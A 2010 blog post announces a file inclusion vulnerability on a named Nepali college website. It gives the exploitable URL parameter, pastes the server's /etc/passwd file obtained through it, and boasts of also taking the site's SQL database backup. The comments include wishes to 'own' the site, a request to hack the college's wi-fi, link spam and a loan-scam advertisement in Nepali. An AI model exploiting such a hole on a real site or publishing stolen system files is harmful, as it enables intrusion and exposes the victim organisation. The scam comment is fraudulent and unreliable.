Sunday, 25 April 2010

LACM.EDU.NP [little angels college of management] File inclusion vulnerability

I was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]


/etc/passwd:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash

And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.
See you guys.

5 comments:

 1. Fuck.. I couldnot own them...

  ReplyDelete
 2. can u hack the password of wi-fi connection of LACM?

  ReplyDelete
 3. Nice article
  visit
  How to make money fast
  to learn and earn more money.

  ReplyDelete
 4. म एडम्स KEVIN, Aiico बीमा plc को एक प्रतिनिधि, हामी भरोसा र एक ऋण बाहिर दिन मा व्यक्तिगत मतभेद आदर। हामी ऋण चासो दर को 2% प्रदान गर्नेछ। तपाईं यस व्यवसाय मा चासो हो भने अब आफ्नो ऋण कागजातहरू ठीक जारी हस्तांतरण ई-मेल (adams.credi@gmail.com) गरेर हामीलाई सम्पर्क। Plc.you पनि इमेल गरेर हामीलाई सम्पर्क गर्न सक्नुहुन्छ तपाईं aiico बीमा गर्न धेरै स्वागत छ भने व्यापार वा स्कूल स्थापित गर्न एक ऋण आवश्यकता हो (aiicco_insuranceplc@yahoo.com) हामी सन्तुलन स्थानान्तरण अनुरोध गर्न सक्छौं पहिलो हप्ता।

  व्यक्तिगत व्यवसायका लागि ऋण चाहिन्छ? तपाईं आफ्नो इमेल संपर्क भने उपरोक्त तुरुन्तै आफ्नो ऋण स्थानान्तरण प्रक्रिया गर्न
  ठीक।

  ReplyDelete